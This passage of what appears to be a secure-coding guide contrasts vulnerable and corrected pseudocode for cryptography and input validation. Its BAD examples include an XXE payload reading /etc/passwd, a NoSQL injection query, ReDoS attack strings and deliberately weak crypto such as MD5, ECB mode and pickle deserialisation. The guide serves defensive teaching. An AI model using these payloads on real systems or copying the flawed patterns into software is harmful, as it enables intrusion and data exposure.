+END FUNCTION + +FUNCTION reset_password(token, new_password): + reset_record = validate_reset_token(token) + + IF reset_record IS NULL: + RETURN {success: FALSE, error: "Invalid or expired reset link"} + END IF + + // Validate new password strength + validation = validate_password_strength(new_password) + IF NOT validation.is_valid: + RETURN {success: FALSE, error: validation.message} + END IF + + user = database.get_user(reset_record.user_id) + + // Check if new password is same as old + IF bcrypt.verify(new_password, user.password_hash): + RETURN {success: FALSE, error: "New password must be different"} + END IF + + // Update password + user.password_hash = bcrypt.hash(new_password, rounds=12) + database.save(user) + + // CRITICAL: Invalidate the reset token + database.delete_reset_token(sha256(token)) + + // Invalidate all existing sessions (force re-login) + session_store.delete_all_user_sessions(user.id) + + // Send confirmation email + send_email(user.email, "password_changed", { + timestamp: current_time(), + ip_address: request.get_client_ip() + }) + + log.info("Password reset completed", {user_id: user.id}) + + RETURN {success: TRUE, message: "Password reset successfully"} +END FUNCTION + +// Additional security: Limit reset requests +FUNCTION rate_limit_reset_requests(email): + key = "password_reset:" + sha256(email) + attempts = rate_limiter.get(key, default=0) + + IF attempts >= 3: + // Max 3 reset requests per hour + RETURN FALSE + END IF + + rate_limiter.increment(key, ttl=3600) + RETURN TRUE +END FUNCTION +``` + +--- + +## 5. 
Cryptographic Failures + +**CWE References:** CWE-327 (Use of Broken or Risky Cryptographic Algorithm), CWE-328 (Reversible One-Way Hash), CWE-330 (Use of Insufficiently Random Values), CWE-326 (Inadequate Encryption Strength), CWE-759 (Use of One-Way Hash without a Salt) +**Severity:** High to Critical | **Related:** [[Cryptographic-Misuse]] + +> **Risk:** AI models frequently suggest outdated or weak cryptographic algorithms (MD5, SHA-1, DES) learned from decades of legacy code in training data. Cryptographic failures lead to data exposure, password compromise, and authentication bypass. A 14% failure rate for CWE-327 was documented in AI-generated code, with "significant increase" in encryption vulnerabilities when using AI assistants. + +### 5.1 Using Deprecated Algorithms (MD5, SHA1 for Security, DES) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Deprecated hash algorithms for security +// ======================================== +FUNCTION hash_password_weak(password): + // Vulnerable: MD5 is cryptographically broken + RETURN md5(password) +END FUNCTION + +FUNCTION verify_integrity_weak(data): + // Vulnerable: SHA-1 has known collision attacks + RETURN sha1(data) +END FUNCTION + +FUNCTION encrypt_data_weak(plaintext, key): + // Vulnerable: DES uses 56-bit keys (trivially breakable) + cipher = DES.new(key, mode=ECB) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +// Problems: +// - MD5: Collisions found in seconds, rainbow tables widely available +// - SHA-1: Collision attacks demonstrated (SHAttered, 2017) +// - DES: Brute-forceable in hours with modern hardware + +// ======================================== +// GOOD: Modern cryptographic algorithms +// ======================================== +FUNCTION hash_password_secure(password): + // Use bcrypt, Argon2, or scrypt for passwords + salt = bcrypt.generate_salt(rounds=12) + RETURN bcrypt.hash(password, salt) +END FUNCTION + +FUNCTION 
verify_integrity_secure(data): + // Use SHA-256, SHA-3, or BLAKE2 for integrity + RETURN sha256(data) +END FUNCTION + +FUNCTION encrypt_data_secure(plaintext, key): + // Use AES-256-GCM or ChaCha20-Poly1305 + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + RETURN nonce + tag + ciphertext // Include nonce and auth tag +END FUNCTION + +// Algorithm selection guide: +// - Password hashing: bcrypt, Argon2id, scrypt (NOT SHA-256 alone) +// - Symmetric encryption: AES-256-GCM, ChaCha20-Poly1305 +// - Integrity/checksums: SHA-256, SHA-3, BLAKE2 +// - Signatures: Ed25519, ECDSA with P-256, RSA-2048+ +``` + +### 5.2 Hardcoded Encryption Keys + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Hardcoded encryption keys in source +// ======================================== +CONSTANT ENCRYPTION_KEY = "MySecretKey12345" // Committed to repo! +CONSTANT AES_KEY = bytes([0x2b, 0x7e, 0x15, 0x16, ...]) // Still hardcoded + +FUNCTION encrypt_user_data(data): + cipher = AES.new(ENCRYPTION_KEY, mode=GCM) + RETURN cipher.encrypt(data) +END FUNCTION + +// Problems: +// - Keys in version control are exposed forever +// - Cannot rotate keys without code changes +// - All environments share same key + +// ======================================== +// GOOD: External key management +// ======================================== +FUNCTION get_encryption_key(): + // Option 1: Environment variable + key = environment.get("ENCRYPTION_KEY") + + IF key IS NULL: + THROW Error("ENCRYPTION_KEY environment variable required") + END IF + + // Validate key length for AES-256 + key_bytes = base64_decode(key) + IF key_bytes.length != 32: + THROW Error("ENCRYPTION_KEY must be 256 bits") + END IF + + RETURN key_bytes +END FUNCTION + +FUNCTION encrypt_user_data(data): + key = get_encryption_key() + nonce = crypto.secure_random_bytes(12) + cipher = AES_GCM.new(key, 
nonce) + ciphertext, tag = cipher.encrypt_and_digest(data) + RETURN nonce + tag + ciphertext +END FUNCTION + +// Better: Use a secret manager for production +FUNCTION get_encryption_key_from_manager(): + TRY: + // AWS Secrets Manager, HashiCorp Vault, Azure Key Vault, etc. + secret = secret_manager.get_secret("encryption-key") + RETURN base64_decode(secret.value) + CATCH Error as e: + log.error("Failed to retrieve encryption key", {error: e.message}) + THROW Error("Encryption key unavailable") + END TRY +END FUNCTION +``` + +### 5.3 ECB Mode Usage + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: ECB mode reveals patterns in data +// ======================================== +FUNCTION encrypt_ecb(plaintext, key): + // Vulnerable: ECB encrypts identical blocks identically + cipher = AES.new(key, mode=ECB) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +// Problem demonstration: +// Encrypting an image with ECB mode preserves visual patterns +// because identical 16-byte blocks produce identical ciphertext +// This reveals structure of the original data! + +// Identical plaintexts produce identical ciphertexts: +// plaintext_block_1 = "AAAAAAAAAAAAAAAA" +// plaintext_block_2 = "AAAAAAAAAAAAAAAA" +// ciphertext_1 == ciphertext_2 // Information leaked! 
+ +// ======================================== +// GOOD: Use authenticated encryption modes +// ======================================== +FUNCTION encrypt_gcm(plaintext, key): + // GCM mode: Each encryption is unique even for same plaintext + nonce = crypto.secure_random_bytes(12) // 96-bit nonce for GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, auth_tag = cipher.encrypt_and_digest(plaintext) + + // Return nonce + tag + ciphertext (all needed for decryption) + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION decrypt_gcm(encrypted_data, key): + // Extract components + nonce = encrypted_data[0:12] + auth_tag = encrypted_data[12:28] + ciphertext = encrypted_data[28:] + + cipher = AES_GCM.new(key, nonce) + + TRY: + plaintext = cipher.decrypt_and_verify(ciphertext, auth_tag) + RETURN plaintext + CATCH AuthenticationError: + // Tampering detected! + log.warning("Decryption failed: authentication tag mismatch") + THROW Error("Data integrity check failed") + END TRY +END FUNCTION + +// Alternative: CBC mode (if GCM not available) +FUNCTION encrypt_cbc(plaintext, enc_key, mac_key): + // CBC requires a fresh random IV for each encryption + iv = crypto.secure_random_bytes(16) + + cipher = AES_CBC.new(enc_key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Must also add HMAC for authentication (encrypt-then-MAC) + // Use a separate MAC key; never reuse the encryption key for the HMAC + mac = hmac_sha256(mac_key, iv + ciphertext) + + RETURN iv + ciphertext + mac +END FUNCTION +``` + +### 5.4 Missing or Weak IVs/Nonces + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Predictable or reused IVs/nonces +// ======================================== +FUNCTION encrypt_static_iv(plaintext, key): + // Vulnerable: Static IV - identical plaintexts have identical ciphertexts + iv = bytes([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]) + cipher = AES_CBC.new(key, iv) + RETURN cipher.encrypt(pad(plaintext)) +END FUNCTION + +FUNCTION
encrypt_counter_nonce(plaintext, key, message_counter): + // Vulnerable: Counter is not persisted or coordinated - a restart, rollback, + // or second writer repeats nonce values under the same key + nonce = int_to_bytes(message_counter, length=12) + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +FUNCTION encrypt_truncated_nonce(plaintext, key): + // Vulnerable: Nonce too short + nonce = crypto.secure_random_bytes(4) // Only 32 bits! + cipher = AES_GCM.new(key, nonce) + RETURN cipher.encrypt(plaintext) +END FUNCTION + +// Problems: +// - Static IV: Same plaintext → same ciphertext (pattern leakage) +// - Predictable IV (CBC): Allows chosen-plaintext attacks +// - Unmanaged counter nonce (GCM): Repeats after a reset; GCM nonces need uniqueness, not secrecy +// - Short nonce: Birthday collision after ~2^16 messages +// - GCM with repeated nonce: CATASTROPHIC - authentication key recovered! + +// ======================================== +// GOOD: Cryptographically random IVs/nonces +// ======================================== +FUNCTION encrypt_with_random_iv(plaintext, key): + // Generate random IV for each encryption + iv = crypto.secure_random_bytes(16) // 128 bits for AES-CBC + + cipher = AES_CBC.new(key, iv) + padded = pkcs7_pad(plaintext, block_size=16) + ciphertext = cipher.encrypt(padded) + + // Prepend IV (it's not secret, but must be unpredictable and never reused) + // Note: CBC alone is unauthenticated; add encrypt-then-MAC or prefer AES-GCM + RETURN iv + ciphertext +END FUNCTION + +FUNCTION encrypt_with_random_nonce(plaintext, key): + // Generate random nonce for each encryption + nonce = crypto.secure_random_bytes(12) // 96 bits for AES-GCM + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag = cipher.encrypt_and_digest(plaintext) + + RETURN nonce + tag + ciphertext +END FUNCTION + +// For high-volume encryption: Use key+nonce management +FUNCTION encrypt_with_derived_nonce(plaintext, key, message_id): + // Derive the nonce from a key-specific subkey and the message ID + // message_id MUST be unique per key, otherwise the nonce repeats + + nonce_key = derive_key(key, "nonce-derivation") + nonce = hmac_sha256(nonce_key, message_id)[0:12] + + cipher = AES_GCM.new(key, nonce) + ciphertext, tag =
cipher.encrypt_and_digest(plaintext) + + RETURN message_id + tag + ciphertext // Include message_id for decryption +END FUNCTION +``` + +### 5.5 Rolling Your Own Crypto + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Custom cryptographic implementations +// ======================================== +FUNCTION my_encrypt(plaintext, key): + // Vulnerable: XOR "encryption" is trivially broken + result = "" + FOR i = 0 TO plaintext.length - 1: + result += char(plaintext[i] XOR key[i % key.length]) + END FOR + RETURN result +END FUNCTION + +FUNCTION my_hash(data): + // Vulnerable: Custom hash is not collision-resistant + result = 0 + FOR byte IN data: + result = (result * 31 + byte) % 2147483647 + END FOR + RETURN result +END FUNCTION + +FUNCTION my_random(seed): + // Vulnerable: Linear congruential generator + RETURN (seed * 1103515245 + 12345) % (2^31) +END FUNCTION + +// Problems: +// - XOR cipher: Trivially broken with known-plaintext +// - Custom hash: Collisions easily found +// - LCG random: Completely predictable sequence + +// ======================================== +// GOOD: Use established cryptographic libraries +// ======================================== +FUNCTION encrypt_properly(plaintext, key): + // Use vetted library implementations + // Python: cryptography library + // Node.js: crypto module + // Java: javax.crypto + // Go: crypto/* packages + + // AES-GCM from standard library + nonce = crypto.secure_random_bytes(12) + cipher = crypto.createCipheriv("aes-256-gcm", key, nonce) + + ciphertext = cipher.update(plaintext) + cipher.final() + auth_tag = cipher.getAuthTag() + + RETURN nonce + auth_tag + ciphertext +END FUNCTION + +FUNCTION hash_properly(data): + // Use standard library hash functions + RETURN crypto.sha256(data) +END FUNCTION + +FUNCTION random_properly(num_bytes): + // Use OS-provided cryptographic randomness + RETURN crypto.secure_random_bytes(num_bytes) +END FUNCTION + +// 
Rule: Never implement cryptographic primitives yourself +// - Encryption: Use library AES-GCM, ChaCha20-Poly1305 +// - Hashing: Use library SHA-256, SHA-3, BLAKE2 +// - Signatures: Use library Ed25519, ECDSA +// - Random: Use the OS CSPRNG via a library (e.g., Python secrets module or os.urandom) +``` + +### 5.6 Insecure Random Number Generation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Non-cryptographic RNG for security +// ======================================== +FUNCTION generate_session_id_weak(): + // Vulnerable: Math.random() / random.random() is predictable, + // and this range holds fewer than 30 bits + RETURN random.randint(0, 999999999) +END FUNCTION + +FUNCTION generate_token_weak(): + // Vulnerable: Using random module for security tokens + chars = "abcdefghijklmnopqrstuvwxyz0123456789" + token = "" + FOR i = 0 TO 31: + token += chars[random.randint(0, chars.length - 1)] + END FOR + RETURN token +END FUNCTION + +FUNCTION generate_key_weak(): + // Vulnerable: Time-based seeding + random.seed(current_timestamp()) + key = random.randbytes(32) + RETURN key +END FUNCTION + +// Problems: +// - Math.random() / random.random(): Predictable PRNGs (xorshift128+ in V8, Mersenne Twister in Python) +// - Time seed: Attacker can guess seed from approximate time +// - Internal state: Mersenne Twister state can be recovered from 624 consecutive 32-bit outputs + +// ======================================== +// GOOD: Cryptographically secure randomness +// ======================================== +FUNCTION generate_session_id_secure(): + // Use cryptographically secure random + RETURN secrets.token_urlsafe(32) // 256 bits of entropy +END FUNCTION + +FUNCTION generate_token_secure(): + // Use secrets module (Python) or crypto.randomBytes (Node) + RETURN secrets.token_hex(32) // 256 bits as hex string +END FUNCTION + +FUNCTION generate_key_secure(): + // Use OS entropy source + RETURN os.urandom(32) // 256 bits from /dev/urandom or equivalent +END FUNCTION + +FUNCTION generate_password_secure(length): + // Secure password generation + alphabet =
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*" + password = "" + FOR i = 0 TO length - 1: + password += alphabet[secrets.randbelow(alphabet.length)] + END FOR + RETURN password +END FUNCTION + +// Language-specific secure random: +// Python: secrets module, os.urandom +// Node.js: crypto.randomBytes, crypto.randomUUID +// Java: SecureRandom +// Go: crypto/rand +// Ruby: SecureRandom +// PHP: random_bytes, random_int +``` + +### 5.7 Improper Key Derivation + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Weak key derivation methods +// ======================================== +FUNCTION derive_key_weak(password): + // Vulnerable: Direct hash of password + RETURN sha256(password) +END FUNCTION + +FUNCTION derive_key_truncated(password): + // Vulnerable: Password truncation + RETURN password.bytes()[0:32] // Loses entropy! +END FUNCTION + +FUNCTION derive_key_md5(password, salt): + // Vulnerable: MD5 with low iteration count + RETURN md5(salt + password) +END FUNCTION + +FUNCTION derive_key_fast(password, salt): + // Vulnerable: Single SHA iteration (too fast to brute-force resist) + RETURN sha256(salt + password) +END FUNCTION + +// Problems: +// - Direct hash: No salt, no iterations, vulnerable to rainbow tables +// - Truncation: Reduces entropy, predictable patterns +// - Fast hash: GPU can compute billions per second + +// ======================================== +// GOOD: Proper key derivation functions +// ======================================== +FUNCTION derive_key_pbkdf2(password, salt): + // PBKDF2 with high iteration count + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = pbkdf2_hmac( + hash_name="sha256", + password=password.encode(), + salt=salt, + iterations=600000, // OWASP recommends 600,000+ for SHA-256 + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_argon2(password, salt): + // Argon2id - 
memory-hard, recommended for passwords + IF salt IS NULL: + salt = crypto.secure_random_bytes(16) + END IF + + key = argon2id.hash( + password=password, + salt=salt, + time_cost=3, // Iterations + memory_cost=65536, // 64MB memory + parallelism=4, // 4 threads + hash_len=32 // Output length + ) + RETURN {key: key, salt: salt} +END FUNCTION + +FUNCTION derive_key_scrypt(password, salt): + // scrypt - memory-hard alternative + IF salt IS NULL: + salt = crypto.secure_random_bytes(32) + END IF + + key = scrypt( + password=password.encode(), + salt=salt, + n=2^17, // CPU/memory cost (131072) + r=8, // Block size + p=1, // Parallelism + key_length=32 + ) + RETURN {key: key, salt: salt} +END FUNCTION + +// For deriving multiple keys from one password +FUNCTION derive_multiple_keys(password, salt): + // Use HKDF to derive multiple keys from master key + master_key = derive_key_argon2(password, salt).key + + encryption_key = hkdf_expand( + master_key, + info="encryption", + length=32 + ) + + mac_key = hkdf_expand( + master_key, + info="mac", + length=32 + ) + + RETURN { + encryption_key: encryption_key, + mac_key: mac_key + } +END FUNCTION +``` + +--- + +## 6. Input Validation + +**CWE References:** CWE-20 (Improper Input Validation), CWE-1284 (Improper Validation of Specified Quantity in Input), CWE-1333 (Inefficient Regular Expression Complexity), CWE-22 (Path Traversal), CWE-180 (Incorrect Behavior Order: Validate Before Canonicalize) +**Severity:** High | **Related:** [[Input-Validation]] + +> **Risk:** Input validation failures are a foundational vulnerability enabling most other attack classes. AI-generated code frequently relies solely on client-side validation (trivially bypassed) or omits validation entirely. Missing length limits enable DoS attacks, improper type checking allows type confusion attacks, and ReDoS patterns can freeze services. All user input must be validated on the server with type, length, format, and range constraints. 
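
The four constraints named above (type, length, format, range) can be sketched in Python as follows. This is a minimal illustration under stated assumptions, not a definitive implementation: `validate_signup`, `EMAIL_RE`, `MAX_EMAIL_LENGTH`, and the specific limits are hypothetical names and values chosen for the example.

```python
import re

# Assumption: a deliberately simple email shape check with no nested
# quantifiers. It is not full RFC 5322 validation.
EMAIL_RE = re.compile(r"[^@\s]+@[^@\s]+\.[^@\s]+")
MAX_EMAIL_LENGTH = 254  # assumed limit for this sketch


def validate_signup(payload):
    """Return a list of error strings; an empty list means the payload passed."""
    if not isinstance(payload, dict):
        return ["Payload must be an object"]

    errors = []

    email = payload.get("email")
    if not isinstance(email, str):                 # type
        errors.append("Email must be a string")
    elif len(email) > MAX_EMAIL_LENGTH:            # length, checked before the regex
        errors.append("Email too long")
    elif not EMAIL_RE.fullmatch(email):            # format
        errors.append("Invalid email format")

    age = payload.get("age")
    # bool is a subclass of int in Python, so reject it explicitly.
    if isinstance(age, bool) or not isinstance(age, int):   # type
        errors.append("Age must be an integer")
    elif not 0 <= age <= 150:                                # range
        errors.append("Age must be between 0 and 150")

    return errors
```

Calling `validate_signup({"email": "not-an-email", "age": -999})` returns one format error and one range error, while a well-formed payload returns an empty list. Checking the length before running the regex keeps the pattern from ever seeing oversized input.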
+ +### 6.1 Missing Server-Side Validation (Client-Only) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Client-side only validation +// ======================================== +// Frontend JavaScript +FUNCTION validate_form_client_only(): + email = document.getElementById("email").value + age = document.getElementById("age").value + + IF NOT email.includes("@"): + show_error("Invalid email") + RETURN FALSE + END IF + + IF age < 0 OR age > 150: + show_error("Invalid age") + RETURN FALSE + END IF + + // Form submits if client-side validation passes + form.submit() +END FUNCTION + +// Backend - NO validation! +FUNCTION create_user(request): + // Vulnerable: Trusts client-side validation completely + email = request.body.email + age = request.body.age + + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Attack: Attacker bypasses JavaScript with direct HTTP request +// curl -X POST /api/users -d '{"email":"not-an-email","age":-999}' +// Result: Invalid data stored in database + +// ======================================== +// GOOD: Server-side validation (client-side is UX only) +// ======================================== +// Backend - validates everything +FUNCTION create_user(request): + // Validate all input server-side + validation_errors = [] + + // Email validation + email = request.body.email + IF typeof(email) != "string": + validation_errors.append("Email must be a string") + ELSE IF NOT regex.match("^[^@]+@[^@]+\.[^@]+$", email): + validation_errors.append("Invalid email format") + ELSE IF email.length > 254: + validation_errors.append("Email too long") + END IF + + // Age validation + age = request.body.age + IF typeof(age) != "number" OR NOT is_integer(age): + validation_errors.append("Age must be an integer") + ELSE IF age < 0 OR age > 150: + validation_errors.append("Age must be between 0 and 150") + END IF + + IF validation_errors.length > 0: 
+ RETURN {success: FALSE, errors: validation_errors} + END IF + + // Safe to process validated data + database.insert("users", {email: email, age: age}) + RETURN {success: TRUE} +END FUNCTION + +// Client-side validation is still useful for UX (immediate feedback) +// but NEVER rely on it for security +``` + +### 6.2 Improper Type Checking + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Missing or weak type validation +// ======================================== +FUNCTION process_payment_weak(request): + amount = request.body.amount + quantity = request.body.quantity + + // Vulnerable: No type checking + total = amount * quantity + + // What if amount = "100" (string)? JavaScript: "100" * 2 = 200 (coerced) + // What if amount = [100]? Some languages coerce arrays unexpectedly + // What if quantity = {"$gt": 0}? NoSQL injection possible + + charge_card(user, total) +END FUNCTION + +FUNCTION get_user_weak(request): + user_id = request.params.id + + // Vulnerable: ID could be array, object, or unexpected type + // MongoDB: ?id[$ne]=null returns all users! 
+ RETURN database.find_one({id: user_id}) +END FUNCTION + +FUNCTION calculate_discount_weak(price, discount_percent): + // Vulnerable: No validation of numeric types + // discount_percent = "50" → string concatenation in some languages + // discount_percent = NaN → NaN propagates through calculations + final_price = price - (price * discount_percent / 100) + RETURN final_price +END FUNCTION + +// ======================================== +// GOOD: Strict type validation +// ======================================== +FUNCTION process_payment_safe(request): + // Validate amount + amount = request.body.amount + IF typeof(amount) != "number": + THROW ValidationError("Amount must be a number") + END IF + IF NOT is_finite(amount) OR is_nan(amount): + THROW ValidationError("Amount must be a valid number") + END IF + IF amount <= 0: + THROW ValidationError("Amount must be positive") + END IF + + // Validate quantity + quantity = request.body.quantity + IF typeof(quantity) != "number" OR NOT is_integer(quantity): + THROW ValidationError("Quantity must be an integer") + END IF + IF quantity <= 0 OR quantity > 1000: + THROW ValidationError("Quantity must be between 1 and 1000") + END IF + + // Safe to calculate + total = amount * quantity + + // Additional: Prevent floating point issues with currency + total_cents = round(total * 100) // Work in cents + charge_card(user, total_cents) +END FUNCTION + +FUNCTION get_user_safe(request): + user_id = request.params.id + + // Strict type checking + IF typeof(user_id) != "string": + THROW ValidationError("User ID must be a string") + END IF + + // Format validation (e.g., UUID) + IF NOT is_valid_uuid(user_id): + THROW ValidationError("Invalid user ID format") + END IF + + RETURN database.find_one({id: user_id}) +END FUNCTION + +// Type coercion helper with explicit validation +FUNCTION parse_integer_strict(value, min, max): + IF typeof(value) == "number": + IF NOT is_integer(value): + THROW ValidationError("Expected integer, got 
float") + END IF + result = value + ELSE IF typeof(value) == "string": + IF NOT regex.match("^-?[0-9]+$", value): + THROW ValidationError("Invalid integer format") + END IF + result = parse_int(value) + ELSE: + THROW ValidationError("Expected number or numeric string") + END IF + + IF result < min OR result > max: + THROW ValidationError("Value out of range: " + min + " to " + max) + END IF + + RETURN result +END FUNCTION +``` + +### 6.3 Missing Length Limits + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: No length limits on input +// ======================================== +FUNCTION create_post_unlimited(request): + title = request.body.title + content = request.body.content + + // Vulnerable: No length limits + // Attacker sends 1GB title, exhausts memory/storage + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_unlimited(request): + query = request.params.q + + // Vulnerable: Long query strings can DoS search systems + // Also enables ReDoS if query is used in regex + results = database.search(query) + RETURN results +END FUNCTION + +FUNCTION process_file_unlimited(request): + file_content = request.body.file + + // Vulnerable: No file size limit + // Attacker uploads 10GB file, exhausts disk/memory + save_file(file_content) +END FUNCTION + +// Real-world DoS: JSON payload with deeply nested objects +// {"a":{"a":{"a":{"a":...}}}} // 1000 levels deep +// Can crash parsers or exhaust stack space + +// ======================================== +// GOOD: Enforce length limits on all inputs +// ======================================== +CONSTANT MAX_TITLE_LENGTH = 200 +CONSTANT MAX_CONTENT_LENGTH = 50000 +CONSTANT MAX_SEARCH_QUERY = 500 +CONSTANT MAX_FILE_SIZE = 10 * 1024 * 1024 // 10MB +CONSTANT MAX_JSON_DEPTH = 20 + +FUNCTION create_post_limited(request): + title = request.body.title + content = request.body.content + + // Validate title length + IF 
typeof(title) != "string": + THROW ValidationError("Title must be a string") + END IF + IF title.length == 0: + THROW ValidationError("Title is required") + END IF + IF title.length > MAX_TITLE_LENGTH: + THROW ValidationError("Title exceeds " + MAX_TITLE_LENGTH + " characters") + END IF + + // Validate content length + IF typeof(content) != "string": + THROW ValidationError("Content must be a string") + END IF + IF content.length > MAX_CONTENT_LENGTH: + THROW ValidationError("Content exceeds " + MAX_CONTENT_LENGTH + " characters") + END IF + + database.insert("posts", {title: title, content: content}) +END FUNCTION + +FUNCTION search_limited(request): + query = request.params.q + + IF typeof(query) != "string": + THROW ValidationError("Query must be a string") + END IF + IF query.length > MAX_SEARCH_QUERY: + THROW ValidationError("Search query too long") + END IF + IF query.length < 2: + THROW ValidationError("Search query too short") + END IF + + results = database.search(query) + RETURN results +END FUNCTION + +// Configure request body limits at framework level +FUNCTION configure_server(): + server.set_body_limit(MAX_FILE_SIZE) + server.set_json_depth_limit(MAX_JSON_DEPTH) + server.set_parameter_limit(1000) // Max form fields + server.set_header_size_limit(8192) // 8KB header limit +END FUNCTION + +// Array length limits +FUNCTION process_batch_request(request): + items = request.body.items + + IF NOT is_array(items): + THROW ValidationError("Items must be an array") + END IF + IF items.length > 100: + THROW ValidationError("Maximum 100 items per batch") + END IF + + FOR item IN items: + process_single_item(item) + END FOR +END FUNCTION +``` + +### 6.4 Regex Denial of Service (ReDoS) + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Vulnerable regex patterns +// ======================================== +FUNCTION validate_email_redos(email): + // Vulnerable: Catastrophic backtracking on malformed 
input + // Pattern with nested quantifiers + pattern = "^([a-zA-Z0-9]+)+@[a-zA-Z0-9]+\.[a-zA-Z]+$" + + // Attack input: "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!" + // Regex engine tries exponential combinations before failing + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_url_redos(url): + // Vulnerable: Multiple overlapping groups + pattern = "^(https?://)?(www\.)?([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}(/.*)*$" + + // Attack input: "http://aaaaaaaaaaaaaaaaaaaaaaaa" + RETURN regex.match(pattern, url) +END FUNCTION + +FUNCTION search_with_regex(user_pattern, content): + // Vulnerable: User-controlled regex pattern + // Attacker provides: "(a+)+$" with input "aaaaaaaaaaaaaaaaaaaX" + RETURN regex.search(user_pattern, content) +END FUNCTION + +// ReDoS patterns to avoid: +// - Nested quantifiers: (a+)+, (a*)* +// - Overlapping alternatives: (a|a)+, (a|ab)+ +// - Quantified groups with repetition: (a+b+)+ + +// ======================================== +// GOOD: Safe regex patterns and practices +// ======================================== +FUNCTION validate_email_safe(email): + // First: Length check before regex + IF email.length > 254: + RETURN FALSE + END IF + + // Use atomic groups or possessive quantifiers if available + // Or use simpler, non-backtracking patterns + pattern = "^[^@\s]+@[^@\s]+\.[^@\s]+$" // Simple, no backtracking risk + + RETURN regex.match(pattern, email) +END FUNCTION + +FUNCTION validate_email_best(email): + // Best: Use a validated library + TRY: + validated = email_validator.validate(email) + RETURN TRUE + CATCH ValidationError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION validate_url_safe(url): + // Length limit first + IF url.length > 2048: + RETURN FALSE + END IF + + // Use URL parser instead of regex + TRY: + parsed = url_parser.parse(url) + RETURN parsed.host IS NOT NULL AND parsed.protocol IN ["http:", "https:"] + CATCH ParseError: + RETURN FALSE + END TRY +END FUNCTION + +FUNCTION search_with_safe_pattern(user_input, 
content): + // Never use user input directly as regex + // Escape special characters if literal match needed + escaped_input = regex.escape(user_input) + + // Set timeout on regex operations + RETURN regex.search(escaped_input, content, timeout=1000) // 1 second max +END FUNCTION + +// Use RE2 or similar guaranteed-linear-time regex engine +FUNCTION search_with_re2(pattern, content): + // RE2 matches in linear time and rejects constructs it cannot support + // (for example backreferences and lookaround) + TRY: + compiled = re2.compile(pattern) + RETURN compiled.search(content) + CATCH UnsupportedPatternError: + // Pattern uses a construct the engine does not support + THROW ValidationError("Invalid search pattern") + END TRY +END FUNCTION + +// Safe pattern testing +FUNCTION is_safe_regex(pattern): + // Heuristic only: detects common ReDoS shapes, not every vulnerable pattern + dangerous_patterns = [ + "\\([^()]*\\+\\)\\+", // (x+)+ + "\\([^()]*\\*\\)\\+", // (x*)+ + "\\([^()]*\\+\\)\\*", // (x+)* + "\\([^()]*\\|[^()]*\\)\\+" // (a|b)+ + ] + + FOR dangerous IN dangerous_patterns: + IF regex.search(dangerous, pattern): + RETURN FALSE + END IF + END FOR + + RETURN TRUE +END FUNCTION +``` + +### 6.5 Accepting and Processing Untrusted Data + +``` +// PSEUDOCODE - Implement in your target language + +// ======================================== +// BAD: Trusting external data sources +// ======================================== +FUNCTION process_webhook_unsafe(request): + // Vulnerable: No signature verification + data = json.parse(request.body) + + // Attacker can spoof webhook requests + IF data.event == "payment_completed": + mark_order_paid(data.order_id) // Dangerous! + END IF +END FUNCTION + +FUNCTION fetch_and_process_unsafe(url): + // Vulnerable: Processing arbitrary external content + response = http.get(url) + data = json.parse(response.body) + + // No validation of response structure + database.insert("external_data", data) +END FUNCTION + +FUNCTION deserialize_unsafe(serialized_data): + // Vulnerable: Pickle/eval deserialization of untrusted data + // Allows arbitrary code execution!
+ object = pickle.loads(serialized_data) + RETURN object +END FUNCTION + +FUNCTION process_xml_unsafe(xml_string): + // Vulnerable: XXE (XML External Entity) attack + parser = xml.create_parser() + doc = parser.parse(xml_string) + // Attacker XML (typical payload): <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo> + RETURN doc +END FUNCTION + +// ======================================== +// GOOD: Validate and sanitize external data +// ======================================== +FUNCTION process_webhook_safe(request): + // Verify webhook signature (a missing header is treated as invalid) + signature = request.headers.get("X-Signature") + expected = hmac_sha256(WEBHOOK_SECRET, request.raw_body) + + IF signature IS NULL OR NOT constant_time_compare(signature, expected): + log.warning("Invalid webhook signature", {ip: request.ip}) + RETURN {status: 401, error: "Invalid signature"} + END IF + + // Validate payload structure + data = json.parse(request.body) + + IF NOT validate_webhook_schema(data): + RETURN {status: 400, error: "Invalid payload"} + END IF + + // Process verified and validated data + IF data.event == "payment_completed": + // Additional verification: Check with payment provider + IF verify_payment_with_provider(data.payment_id): + mark_order_paid(data.order_id) + END IF + END IF +END FUNCTION + +FUNCTION fetch_and_process_safe(url): + // Validate URL is from allowed sources + parsed_url = url_parser.parse(url) + IF 